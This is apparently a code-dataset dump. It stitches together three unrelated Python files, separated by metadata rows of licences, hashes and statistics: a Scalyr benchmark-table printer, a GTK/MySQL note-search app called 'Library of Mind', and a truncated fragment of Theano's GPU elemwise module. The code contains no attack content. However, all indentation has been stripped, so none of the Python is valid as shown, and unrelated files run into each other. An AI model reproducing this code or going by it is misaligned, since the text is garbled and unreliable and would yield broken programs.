# Copyright 2014-2020 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Script which pretty prints benchmark results for compression algorithms benchmarks.
"""
from __future__ import absolute_import
from __future__ import print_function
import sys
import copy
import json
from io import open
from collections import defaultdict
from prettytable import PrettyTable # pylint: disable=import-error
def main():
with open(sys.argv[1], "r") as fp:
data = fp.read()
data = json.loads(data)
result = defaultdict(list)
print(("=" * 100))
print("Compression")
print(("=" * 100))
for benchmark in data["benchmarks"]:
if benchmark["group"] != "compress":
continue
name = benchmark["name"]
key = "=".join([str(x) for x in benchmark["params"]["log_tuple"]])
mean = benchmark["stats"]["mean"] * 1000
compression_ratio = round(benchmark["stats"]["compression_ratio"], 3)
result[key].append((benchmark["name"], mean, compression_ratio))
for key in result.keys():
values = result[key]
split = key.split("=")
print("")
print(("-" * 100))
print("")
print(("%s %s bytes (-1 means whole file)" % (split[0], split[1])))
print("")
print("Best by timing (less is better)")
print("")
table = PrettyTable()
table.field_names = [
"name",
"mean time in ms (less is better)",
"compression ratio (more is better)",
]
values1 = sorted(copy.copy(values), key=lambda x: x[1])
for name, mean, compression_ratio in values1:
table.add_row((name, mean, compression_ratio))
print(table)
print("")
print("Best by compression ratio (more is better)")
print("")
table = PrettyTable()
table.field_names = [
"name",
"mean time in ms (less is better)",
"compression ratio (more is better)",
]
values2 = sorted(copy.copy(values), key=lambda x: x[2], reverse=True)
for name, mean, compression_ratio in values2:
table.add_row((name, mean, compression_ratio))
print(table)
print("")
print(("=" * 100))
print("")
result = defaultdict(list)
print(("=" * 100))
print("Decompression")
print(("=" * 100))
for benchmark in data["benchmarks"]:
if benchmark["group"] != "decompress":
continue
name = benchmark["name"]
key = "=".join([str(x) for x in benchmark["params"]["log_tuple"]])
mean = benchmark["stats"]["mean"] * 1000
result[key].append((benchmark["name"], mean))
for key in result.keys():
values = result[key]
split = key.split("=")
print("")
print(("-" * 100))
print("")
print(("%s %s bytes (-1 means whole file)" % (split[0], split[1])))
print("")
print("Best by timing (less is better)")
print("")
table = PrettyTable()
table.field_names = ["name", "mean time in ms (less is better)"]
values1 = sorted(copy.copy(values), key=lambda x: x[1])
for name, mean in values1:
table.add_row((name, mean))
print(table)
print("")
print(("=" * 100))
print("")
if __name__ == "__main__":
main()
| apache-2.0 | 6,730,945,357,748,172,000 | 25.006579 | 83 | 0.571718 | false | 4.100622 | false | false | false |
alien3211/lom | Library_of_mind/WindowGTK.py | 1 | 30677 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import log
from MySQL import ConMySQL
from AddRowWindowGTK import AddRowWindowGTK
import csv
import os
from collections import deque, defaultdict
import gi
from gi.repository import Gtk as gtk
from gi.repository import Gdk
gi.require_version('Gtk', '3.0')
def css():
css = b"""
* {
transition-property: color, background-color, border-color, background-image, padding, border-width;
transition-duration: 1s;
}
/* font operate on entire GtkTreeView not for selected row */
GtkTreeView {
text-shadow: 1px 1px 2px black, 0 0 1em blue, 0 0 0.2em blue;
color: white;
font: 1.5em Georgia, "Bitstream Charter", "URW Bookman L", "Century Schoolbook L", serif;
font-weight: bold;
font-style: italic;box-shadow: 5px 3px red;}
GtkTreeView row:nth-child(even) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (#d0e4f7),
color-stop (0.5, darker (#d0e4f7)),
to (#fdffff));
}
GtkTreeView row:nth-child(odd) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (yellow),
color-stop (0.5, darker (yellow)),
to (#fdffff));
}
/* next line only border action operate */
GtkTreeView:selected{color: white; background: green; border-width: 1px; border-color: black;}
/* next line for Gtk.TreeViewColumn */
column-header .button{color: white; background: purple;}
* {
-GtkWindow-resize-grip-default: false;
}
"""
style_provider = gtk.CssProvider()
style_provider.load_from_data(css)
gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(),
style_provider,
gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
WINDOW_WIDTH = 460
WINDOW_HEIGHT = 244
class Window():
def __init__(self, configData={}):
log.LOG("START __init__")
# set config data
self.configData = configData
self.configData['history_file'] = os.path.expanduser("~") + "/.lom_history"
self.configData['history'] = 50
self.configData['short'] = ['Title', 'Name', 'Keys']
self.configData['ip_MySQL'] = '172.19.20.19'
if not os.path.exists(self.configData['lomrc']):
self.setConfig()
if not os.path.exists(self.configData['history_file']):
with open(self.configData['history_file'], 'wb') as f:
f.write("")
self.getConfig()
# Set MySQL IP
ConMySQL.ip = self.configData['ip_MySQL']
# Parse glade XML
self.gladefile = os.path.dirname(os.path.abspath(__file__)) + "/glade/MainWindow.glade"
self.glade = gtk.Builder()
self.glade.add_from_file(self.gladefile)
self.glade.connect_signals(self)
# get object
self.component = {}
self.component['set'] = {}
self.component['search'] = gtk.ListStore(int, str, str, str, str, str, str)
self.component['update'] = gtk.ListStore(int, str, str, str)
self.component['add'] = {}
self.component['type'] = gtk.TreeStore(str, int)
self.component['news'] = gtk.ListStore(int, str, str, str, str, str, str)
self.component['keys'] = gtk.ListStore(str)
self.component['history'] = gtk.ListStore(int, str)
self.window = self.glade.get_object("window")
self.gridMain = self.glade.get_object("gridMain")
self.entryCommandLine = self.glade.get_object("entryCommandLine")
self.labelTitle = self.glade.get_object("labelTitle")
self.labelText = None
self.treeViewResult = None
# set up history command
self.history = deque(maxlen=int(self.configData['history']))
self.histpos = 0
self.getHisoryFromFile()
# initial window
self.initialWindow()
# show all object
self.window.show_all()
# check info
self.initialInfo()
log.LOG("END __init__")
def setConfig(self):
log.LOG("START setConfig")
tmp = dict(filter(lambda x: not x[0].startswith('_'), self.configData.items()))
tmp['short'] = ' '.join(tmp['short'])
with open(self.configData['lomrc'], 'wb') as csvfile:
writer = csv.DictWriter(csvfile, tmp.keys())
writer.writeheader()
writer.writerow(tmp)
self.getConfig()
log.LOG("END setConfig")
def getConfig(self):
log.LOG("START getConfig")
with open(self.configData['lomrc']) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
for k, v in row.items():
self.configData[k] = v
self.configData['short'] = self.configData['short'].split()
log.LOG("END getConfig")
def initialInfo(self):
log.LOG("START initialInfo")
# get news
rows = ConMySQL.getNews(self.configData['user'])
if rows:
self.print_error_message("%d news from last check" % len(rows))
self.getNews()
log.LOG("END initialInfo")
def initialWindow(self):
log.LOG("START initialWindow")
self.window.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)
self.window.set_gravity(Gdk.Gravity.SOUTH_EAST)
self.window.set_keep_above(True)
self.window.set_resizable(False)
self.window.set_decorated(False)
self.entryCommandLine.connect('key_press_event', self.__key_function)
self.commonLayout()
log.LOG("END initialWindow")
def __set_position(self, width=WINDOW_WIDTH, height=WINDOW_HEIGHT):
log.LOG("START __set_position")
(w, h) = width, height
x = int(Gdk.Screen.get_default().get_width() * int(self.configData['_x']))
y = int(Gdk.Screen.get_default().get_height() * int(self.configData['_y']))
# Set position Left-Button
log.LOG("(x,y) = (%s,%s) (w,h) = (%s,%s)" % (x, y, w, h))
self.window.move(x-w, y-h)
log.LOG("END __set_position")
def __key_function(self, entry, event):
log.LOG("START __key_function")
if event.keyval == Gdk.KEY_Return:
self.entryCommandLine.emit_stop_by_name('key_press_event')
elif event.keyval in (Gdk.KEY_KP_Up, Gdk.KEY_Up, Gdk.KEY_Page_Up):
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.historyUp()
elif event.keyval in (Gdk.KEY_KP_Down, Gdk.KEY_Down, Gdk.KEY_Page_Down):
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.historyDown()
elif event.keyval in (Gdk.KEY_D, Gdk.KEY_d) and\
event.state & Gdk.ModifierType.CONTROL_MASK:
self.entryCommandLine.emit_stop_by_name('key_press_event')
self.setHisoryFile()
gtk.main_quit()
self.window.destroy()
log.LOG("END __key_function")
def historyDown(self):
log.LOG("START historyUp")
if self.histpos > 0:
self.entryCommandLine.set_text(self.history[self.histpos])
self.histpos = self.histpos - 1
log.LOG("END historyUp")
def historyUp(self):
log.LOG("START historyDown")
if self.histpos < len(self.history) - 1:
self.entryCommandLine.set_text(self.history[self.histpos])
self.histpos = self.histpos + 1
log.LOG("END historyDown")
def setHisoryFile(self):
with open(self.configData['history_file'], 'w') as f:
f.write('\n'.join(self.history))
def getHisoryFromFile(self):
with open(self.configData['history_file'], 'r') as f:
self.history = deque(maxlen=int(self.configData['history']))
for row in f.read().split('\n'):
self.history.append(row)
def print_error_message(self, text="fill all fields"):
log.LOG("START print_error_message")
md = gtk.MessageDialog(self.window, type=gtk.MessageType.ERROR, buttons=gtk.ButtonsType.OK)
md.set_position(gtk.WindowPosition.CENTER_ON_PARENT)
md.set_markup(text)
md.run()
md.destroy()
return None
log.LOG("END print_error_message")
def entry_dialog(self, message):
log.LOG("START entry_dialog")
dialog = gtk.MessageDialog(self.window, type=gtk.MessageType.QUESTION, buttons=gtk.ButtonsType.OK)
dialog.set_position(gtk.WindowPosition.CENTER_ON_PARENT)
dialog.set_markup(message)
dialogBox = dialog.get_content_area()
entry = gtk.Entry()
entry.set_size_request(200, 0)
dialogBox.pack_end(entry, False, False, 0)
dialog.show_all()
response = dialog.run()
text = entry.get_text()
dialog.destroy()
if (response == gtk.ResponseType.OK) and (text != ''):
return text
else:
return None
log.LOG("END entry_dialog")
def main(self):
log.LOG("START main")
"Run main loop"
gtk.main()
log.LOG("END main")
def deleteEvent(self, widget, event):
log.LOG("START deleteEvent")
gtk.main_quit()
log.LOG("END deleteEvent")
def parserArgs(self, widget):
log.LOG("START parserArgs")
arg = escapePattern(widget.get_text())
rest = arg.split()
self.histpos = 0
if rest and '\n' not in rest:
self.history.appendleft(arg)
command = rest.pop(0) if rest else ""
self.commonLayout()
if command in ['help', 'h']:
self.getHelp(rest)
elif command in ['set']:
self.setOption(rest)
elif command in ['search', 's']:
self.search(rest)
elif command in ['add', 'a']:
self.addParser(rest)
elif command in ['update', 'u']:
self.updateRecord(rest)
elif command in ['type', 't']:
self.getTypeTree(rest)
elif command in ['key', 'k']:
self.getKeysList(rest)
elif command in ['news', 'n']:
self.getNews()
elif command in ['history', 'his']:
self.getHisory()
elif command in ['open', 'o']:
self.openWebBrowser(rest)
elif command in ['exit', 'bye']:
self.setHisoryFile()
gtk.main_quit()
self.window.destroy()
elif command.isdigit():
self.getDigit(int(command))
log.LOG("END parserArgs")
def commonLayout(self):
log.LOG("START commonLayout")
self.labelTitle.set_text("Library Of Mind")
self.window.set_size_request(WINDOW_WIDTH, WINDOW_HEIGHT)
self.entryCommandLine.set_text("")
widget = self.gridMain.get_child_at(0, 1)
if widget is not None:
self.gridMain.remove(widget)
widget = self.gridMain.get_child_at(0, 2)
if widget is not None:
self.gridMain.remove(widget)
self.__set_position()
log.LOG("END commonLayout")
def labelLayout(self, text):
log.LOG("START labelLayout")
log.LOG("Create Scroll")
sw = gtk.ScrolledWindow()
sw.set_shadow_type(gtk.ShadowType.IN)
sw.set_size_request(450, 200)
sw.set_visible(True)
sw.set_policy(gtk.PolicyType.AUTOMATIC, gtk.PolicyType.AUTOMATIC)
self.gridMain.attach(sw, 0, 2, 1, 1)
log.LOG("(0,1): %s" % self.gridMain.get_child_at(0, 1))
self.labelText = gtk.Label()
self.labelText.set_markup(escape(text))
self.labelText.set_visible(True)
self.labelText.set_selectable(True)
self.labelText.props.valign = gtk.Align.START
self.labelText.props.halign = gtk.Align.START
sw.add(self.labelText)
self.__set_position()
log.LOG("END labelLayout")
def treeViewLayout(self, model, activatedRow, getSelectedRow, search_col=0):
"""
Create treeView
model -> GTK Storage
"""
log.LOG("START treeViewLayout")
self.commonLayout()
log.LOG("Create Scroll")
sw = gtk.ScrolledWindow()
sw.set_shadow_type(gtk.ShadowType.IN)
sw.set_size_request(450, 200)
sw.set_can_focus(True)
sw.set_visible(True)
sw.set_policy(gtk.PolicyType.AUTOMATIC, gtk.PolicyType.AUTOMATIC)
self.gridMain.attach(sw, 0, 1, 1, 1)
log.LOG("(0,1): %s" % self.gridMain.get_child_at(0, 1))
self.treeViewResult = gtk.TreeView()
self.treeViewResult.set_size_request(450, 200)
self.treeViewResult.set_visible(True)
self.treeViewResult.set_can_focus(True)
self.treeViewResult.set_model(model)
self.treeViewResult.set_search_column(search_col)
self.treeViewResult.connect("row-activated", activatedRow)
self.treeViewResult.connect("cursor-changed", getSelectedRow)
sw.add(self.treeViewResult)
self.__set_position()
log.LOG("END treeViewLayout")
def doNothing(*arg):
pass
def getSelectedRow(self, widget):
log.LOG("START getSelectedRow")
text_row = """
<span color="#929287">Title: </span><span>{1}</span>
<span color="#929287">Name: </span><span>{2}</span>
<span color="#929287">Description:</span>\n
<span>{4}</span>\n
<span color="#929287">Keys: </span><span>{3}</span>
<span color="#929287">Autor: </span><span weight="bold">{5}</span>\t<span color="#929287">Date: </span><span>{6}</span> """
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
wid = self.gridMain.get_child_at(0, 2)
if wid is not None:
self.gridMain.remove(wid)
self.labelLayout(text_row.format(*model[iter]))
self.__set_position(WINDOW_WIDTH, WINDOW_HEIGHT + 200 if self.configData['_size_200'] else 0)
self.labelTitle.set_text("Search --> %s" % model[iter][2])
log.LOG("END getSelectedRow")
def getSelectedRowType(self, widget, column, data):
log.LOG("START getSelectedRowType")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
type_name = str(model.get_value(iter, 0))
type_id = model.get_value(iter, 1)
typeData = ConMySQL.getTypeByTree()
child = (type_name, type_id)
id_type = ["-it", '[[:<:]]' + str(type_id) + '[[:>:]]']
for i in self.getIdFromTreeType(typeData, child):
id_type.extend(["-it", '[[:<:]]' + str(i) + '[[:>:]]'])
self.commonLayout()
self.search(id_type)
self.labelTitle.set_text("Type select --> %s" % type_name)
log.LOG("END getSelectedRowType")
def getExpandRow(self, widget):
log.LOG("START getExpandRow")
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
path = model.get_path(iter)
widget.expand_to_path(path)
log.LOG("END getExpandRow")
def getIdFromTreeType(self, typeData, parentName=('LOM', 1)):
log.LOG("START getIdFromTreeType")
list_id = []
if not typeData.get(parentName):
return list_id
else:
for child in typeData[parentName]:
list_id.append(child[1])
if typeData.get(child):
list_id.extend(self.getIdFromTreeType(typeData, child))
return list_id
log.LOG("END getIdFromTreeType")
def getSelectedRowKey(self, widget, column, data):
log.LOG("START getSelectedRowKey")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
key_name = str(model.get_value(iter, 0))
id_type = ["-k", '[[:<:]]' + key_name + '[[:>:]]']
self.commonLayout()
self.search(id_type)
self.labelTitle.set_text("Key select --> %s" % key_name)
log.LOG("END getSelectedRowKey")
def getSelectedHis(self, widget, column, data):
log.LOG("START getSelectedHis")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
self.commonLayout()
self.entryCommandLine.set_text(str(model.get_value(iter, 1)))
self.parserArgs(self.entryCommandLine)
log.LOG("END getSelectedHis")
def getSelectedUpdate(self, widget, column, data):
log.LOG("START getSelectedUpdate")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
id_row = model[iter][0]
self.commonLayout()
gtkWindowUpdateRow = AddRowWindowGTK(self.configData['user'], id_row)
gtkWindowUpdateRow.main()
self.labelTitle.set_text("Update select --> %s" % model[iter][1])
log.LOG("END getSelectedUpdate")
def getHelp(self, com):
log.LOG("START getHelp")
if com:
helpList = ConMySQL.getHelp(' '.join(com))[0]
if helpList['name'] == 'ALL':
helpList = '<span color="red">INVALID SYNTAX</span>\n' + helpList['description']
else:
helpList = helpList['description']
log.LOG("#### %s" % helpList)
self.labelLayout(helpList)
else:
helpList = ConMySQL.getHelp()[0]
helpList = helpList['description']
self.labelLayout(helpList)
self.labelTitle.set_text("Help --> %s" % ' '.join(com) or 'All')
log.LOG("END getHelp")
def search(self, com):
log.LOG("START search")
# helper fun
def checkRow(l, d, n):
log.LOG("%s %s %s" % (l, d, n))
t = []
while not l[0].startswith('-'):
t.append(l.pop(0))
if not l:
break
if not t:
return self.print_error_message("Invalid syntax")
else:
dPattern[n].append(' '.join(t))
# clean TreeStore
self.component['search'].clear()
# Parse com
dPattern = defaultdict(list)
if com:
if not com[0].startswith('-'):
pattern = ' '.join(com)
for name in ['name', 'type', 'description', 'key_list', 'name_a']:
dPattern[name].append(pattern)
else:
while com:
k = com.pop(0)
if com:
if k.lower() in ['-id', '-i']:
checkRow(com, dPattern, 'id')
elif k.lower() in ['-name', '-n ']:
checkRow(com, dPattern, 'name')
elif k.lower() in ['-type', '-t']:
checkRow(com, dPattern, 'type')
elif k.lower() in ['-description', '-desc', '-d']:
checkRow(com, dPattern, 'description')
elif k.lower() in ['-key', '-k']:
checkRow(com, dPattern, 'key_list')
elif k.lower() in ['-autor', '-a']:
checkRow(com, dPattern, 'name_a')
elif k.lower() in ['-id_type', '-it']:
checkRow(com, dPattern, 'id_type')
else:
return self.print_error_message("Invalid syntax")
if dPattern:
rows = ConMySQL.getLibDefaultDick(dPattern)
else:
rows = ConMySQL.getLib()
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['search'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['search'], self.doNothing, self.getSelectedRow, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("Search --> %s" % (' '.join(com) if com else "All"))
log.LOG("END search")
def addRecord(self):
log.LOG("START addRecord")
gtkWindowAddRow = AddRowWindowGTK(self.configData['user'])
gtkWindowAddRow.main()
self.labelTitle.set_text("Add record")
log.LOG("END addRecord")
def addParser(self, com):
log.LOG("START addParser")
if com:
if com[0].startswith('-'):
if com[0] in ['-t', '-type']:
if len(com) == 2:
self.selectNewType(com[1])
else:
self.selectNewType()
else:
self.print_error_message("Invalid syntax More in <tt>help add</tt>")
else:
self.print_error_message("Invalid syntax More in <tt>help add</tt>")
else:
self.addRecord()
log.LOG("END addParser")
def selectNewType(self, new_type=None):
log.LOG("START selectNewType")
self.component['type'].clear()
typeData = ConMySQL.getTypeByTree()
# Show all type by pattern
if new_type:
types = ConMySQL.getType(new_type)
for type in types:
child = (type['type'], type['id_type'])
parent = self.component['type'].append(None, child)
self.addRowToTreeView(typeData, child, parent)
else:
# Show all type
self.addRowToTreeView(typeData)
# Create, TreeView Layout
self.treeViewLayout(self.component['type'], self.addNewTypeToSelected, self.doNothing)
# create columns
self.createColumns(self.treeViewResult, [(0, 'Type')])
self.labelTitle.set_text("Add new type. Please select parent type")
log.LOG("END selectNewType")
def addNewTypeToSelected(self, widget, column, data):
log.LOG("START addNewTypeToSelected")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
type_name = str(model.get_value(iter, 0))
type_id = model.get_value(iter, 1)
new_type = self.entry_dialog("Please entry new type to <tt>%s</tt>" % type_name)
if new_type:
ConMySQL.setType(new_type, type_id)
self.commonLayout()
self.labelTitle.set_text("Add new type '%s' to '%s'" % (new_type, type_name))
else:
self.print_error_message("Name is empty More <tt>help add</tt>")
log.LOG("END addNewTypeToSelected")
def getTypeTree(self, com):
log.LOG("START getTypeTree")
log.LOG("START getType")
# clean TreeStore
self.component['type'].clear()
typeData = ConMySQL.getTypeByTree()
# Show all type by pattern
if com:
types = ConMySQL.getType(' '.join(com))
for type in types:
child = (type['type'], type['id_type'])
parent = self.component['type'].append(None, child)
self.addRowToTreeView(typeData, child, parent)
else:
# Show all type
self.addRowToTreeView(typeData)
# Create, TreeView Layout
self.treeViewLayout(self.component['type'], self.getSelectedRowType, self.getExpandRow)
# create columns
self.createColumns(self.treeViewResult, [(0, 'Type')])
self.labelTitle.set_text("Type --> %s" % (' '.join(com) if com else "All"))
log.LOG("END getType")
log.LOG("END getTypeTree")
def updateRecord(self, com):
log.LOG("START updateRecord")
# clean TreeStore
self.component['search'].clear()
# Parse com
dPattern = defaultdict(list)
if com:
pattern = ' '.join(com)
for name in ['name', 'type', 'description', 'key_list', 'name_a']:
dPattern[name].append(pattern)
if dPattern:
rows = ConMySQL.getLibDefaultDick(dPattern)
else:
rows = ConMySQL.getLib()
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['search'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['search'], self.getSelectedUpdate, self.doNothing, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("Update --> %s" % (' '.join(com) if com else "All"))
log.LOG("END updateRecord")
def createColumns(self, treeView, listColumnName):
log.LOG("START createColumns")
for i, name in listColumnName:
rendererText = gtk.CellRendererText()
column = gtk.TreeViewColumn(name, rendererText, text=i)
column.set_clickable(True)
column.set_sort_indicator(True)
column.set_sort_column_id(0)
treeView.append_column(column)
log.LOG("END createColumns")
def addRowToTreeView(self, typeData, parentName=('LOM', 1), parent=None):
log.LOG("START addRowToTreeView")
if not typeData.get(parentName):
return
else:
for child in typeData[parentName]:
newParent = self.component['type'].append(parent, [child[0], child[1]])
if typeData.get(child):
self.addRowToTreeView(typeData, child, newParent)
log.LOG("END addRowToTreeView")
def getKeysList(self, com):
log.LOG("START getKeysList")
# clean TreeStore
self.component['keys'].clear()
if com:
keys = ConMySQL.getUniqueKeys(' '.join(com))
else:
keys = ConMySQL.getUniqueKeys()
for key in keys:
self.component['keys'].append([key['key_name']])
# Create, TreeView Layout
self.treeViewLayout(self.component['keys'], self.getSelectedRowKey, self.doNothing)
# create columns
self.createColumns(self.treeViewResult, [(0, 'keys')])
self.labelTitle.set_text("Keys --> %s" % (' '.join(com) if com else "All"))
log.LOG("END getKeysList")
def mapColumnNameToNumber(self, nameList):
mapNumber = {
'ID': 0,
'Title': 1,
'Name': 2,
'Keys': 3,
'Description': 4,
'name_a': 5,
'data_a': 6}
return [(mapNumber[x], x) for x in nameList if x in mapNumber.keys()]
def getNews(self):
log.LOG("START getNews")
# clean TreeStore
self.component['news'].clear()
rows = ConMySQL.getNews(self.configData['user'])
ConMySQL.updateUser(self.configData['user'])
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['news'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['news'], self.doNothing, self.getSelectedRow, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("News")
log.LOG("END getNews")
def getDigit(self):
log.LOG("START getDigit")
pass
log.LOG("END getDigit")
def getHisory(self):
log.LOG("START getDigit")
# clean TreeStore
self.component['history'].clear()
for row in enumerate(self.history):
self.component['history'].append(row)
# Create, TreeView Layout
self.treeViewLayout(self.component['history'], self.getSelectedHis, self.doNothing, 1)
# create columns
self.createColumns(self.treeViewResult, [(0, 'ID'), (1, 'History')])
self.labelTitle.set_text("History")
log.LOG("END getDigit")
def setOption(self, com):
log.LOG("START setOption")
if len(com) >= 2 and com[0] in self.configData.keys():
self.configData[com[0]] = ' '.join(com[1:])
elif not com:
self.getConfig()
message = ""
for k, v in self.configData.items():
if not k.startswith('_'):
message += "%s = %s\n" % (k, v)
self.labelLayout(message)
else:
self.print_error_message('INVALID SYNTAX')
self.setConfig()
log.LOG("END setOption")
def openWebBrowser(self, com):
log.LOG("START openWebBrowser")
import webbrowser
browser = webbrowser.BackgroundBrowser("gnome-open")
if len(com) >= 2 and com[0].startswith('-'):
option = com.pop(0)
if option in ['-s']:
url = "http://stackoverflow.com/search?q=" + '+'.join(com)
elif option in ['-u']:
url = "http://unix.stackexchange.com/search?q=" + '+'.join(com)
elif option in ['-g']:
url = "https://www.google.pl/search?q=" + '+'.join(com)
else:
return self.print_error_message('INVALID SYNTAX')
browser.open(url)
else:
self.print_error_message('INVALID SYNTAX')
log.LOG("END openWebBrowser")
def escape(s):
"escape html markup"
if isinstance(s, str):
s = s.replace("&", "&")
s = s.replace("\<", "<")
s = s.replace("\>", ">")
return s
def escapePattern(s):
"escape html markup"
if isinstance(s, str):
s = s.replace("\<", "[[:<:]]")
s = s.replace("\>", "[[:>:]]")
return s
| gpl-3.0 | -2,701,084,870,422,299,600 | 29.986869 | 148 | 0.561496 | false | 3.706742 | true | false | false |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/theano/sandbox/gpuarray/elemwise.py | 4 | 118800 | from __future__ import print_function
import copy
from theano.compat import izip
import numpy
import theano
from theano import Apply, scalar, config
from theano import scalar as scal
from six.moves import StringIO, xrange
from theano.gof.utils import MethodNotDefined
from theano.scalar import Scalar
from theano.tensor.elemwise import (Elemwise, DimShuffle, CAReduceDtype)
try:
import pygpu
from pygpu import gpuarray
from pygpu.tools import ScalarArg, ArrayArg
from pygpu.elemwise import ElemwiseKernel
from pygpu.reduction import ReductionKernel
from pygpu.gpuarray import dtype_to_typecode, dtype_to_ctype
except ImportError:
pass
from .basic_ops import (as_gpuarray_variable, HideC, GpuKernelBase, Kernel,
infer_context_name)
from .type import GpuArrayType
from .fp16_help import load_w, write_w
def _is_scalar(v):
False
def make_argument(v, name):
if _is_scalar(v):
return ScalarArg(numpy.dtype(v.type.dtype), name)
else:
return ArrayArg(numpy.dtype(v.type.dtype), name)
def ensure_allocated(storage, shape, dtype, ctx):
odat = storage[0]
if odat is not None:
if odat.shape != shape:
# It is unsafe to try to resize odat,
# we have to allocate output storage.
odat = None
if odat is None:
odat = pygpu.empty(shape, dtype=dtype, context=ctx)
storage[0] = odat
return odat
def as_C_string_const(s):
return '\n'.join('"%s\\n"' % (l.replace('"', '\\"'))
for l in s.split('\n'))
class GpuElemwise(GpuKernelBase, HideC, Elemwise):
"""
Elemwise on the GPU.
"""
nin = property(lambda self: self.scalar_op.nin)
nout = property(lambda self: self.scalar_op.nout)
_f16_ok = True
def __str__(self):
if self.name is not None:
return self.name
items = str(sorted(self.inplace_pattern.items()))
return "GpuElemwise{%s}%s<gpuarray>" % (self.scalar_op, items)
def make_node(self, *inputs):
ctx_name = infer_context_name(*inputs)
res = Elemwise.make_node(self, *inputs)
outputs = [GpuArrayType(broadcastable=o.type.broadcastable,
context_name=ctx_name,
dtype=o.type.dtype)() for o in res.outputs]
if len(outputs) > 1:
raise NotImplementedError()
inputs = [as_gpuarray_variable(i, ctx_name) for i in inputs]
node = Apply(self, inputs, outputs)
# Try to generate the kernel to catch SupportCodeErrors
try:
scal_ins = [scalar.get_scalar_type(i.dtype) for i in node.inputs]
scal_out = [scalar.get_scalar_type(o.dtype) for o in node.outputs]
fake_node = Apply(self.scalar_op, [i() for i in scal_ins],
[o() for o in scal_out])
code = self.scalar_op.c_support_code_apply(fake_node, "test")
if code:
raise SupportCodeError(code)
except MethodNotDefined:
pass
try:
support_code = self.scalar_op.c_support_code()
if (support_code.strip() != "#define THEANO_MACRO_MOD(x,y) (x % y)" and
support_code.strip() != ""):
# The macro is fine, the C++ struct is not.
raise SupportCodeError(support_code)
except MethodNotDefined:
pass
return node
def get_params(self, node):
return node.inputs[0].type.context
def generate_kernel(self, node, nodename):
inps = [make_argument(i, 'i%d' % (n,)) for n, i in
enumerate(node.inputs)]
scal_v_ins = [scalar.get_scalar_type(i.dtype) for i in node.inputs]
outs = [make_argument(o, 'o%d' % (n,)) for n, o in
enumerate(node.outputs) if n not in self.inplace_pattern]
scal_v_outs = [scalar.get_scalar_type(o.dtype) for o in node.outputs]
fake_node = Apply(self.scalar_op, [i() for i in scal_v_ins],
[o() for o in scal_v_outs])
scal_in = [i.name + '[i]' if i.dtype != 'float16' else
'__half2float(' + i.name + '[i])' for i in inps]
scal_out = []
oi = 0
scal_f16 = []
for n in range(len(node.outputs)):
if n in self.inplace_pattern:
arg = inps[self.inplace_pattern[n]]
else:
arg = outs[oi]
oi += 1
if arg.dtype == 'float16':
scal_f16.append(('tmpf16%i' % (len(scal_f16),), arg))
scal_out.append(scal_f16[-1][0])
else:
scal_out.append(arg.name + '[i]')
kop = self.scalar_op.c_code(fake_node, nodename + '_scalar',
scal_in, scal_out,
dict(fail='return;'))
if scal_f16:
# if we have float16 scalars on output we have to wrap
# them and insert a stand-in float32 variable since
# float16 arithemtic is not available
code = ["{"]
for f in scal_f16:
code.append('ga_float %s;' % (f[0],))
# XXX: The replace is an ugly hack to make sure temp
# variables inthe middle are float32
code.append(kop.replace('npy_float16', 'ga_float'))
for f in scal_f16:
code.append('%s[i] = __float2half_rn(%s);' % (f[1].name, f[0]))
code.append('}')
kop = '\n'.join(code)
support_code = ""
try:
# We accept only some c_support_code().
# This filter is done in the make_node()
support_code += self.scalar_op.c_support_code()
except MethodNotDefined:
pass
for npy, ga in [("npy_uint8", "ga_ubyte"),
("npy_uint16", "ga_ushort"),
("npy_uint32", "ga_uint"),
("npy_uint64", "ga_ulong"),
("npy_int8", "ga_byte"),
("npy_int16", "ga_short"),
("npy_int32", "ga_int"),
("npy_int64", "ga_long"),
("npy_float16", "ga_half"),
("npy_float32", "ga_float"),
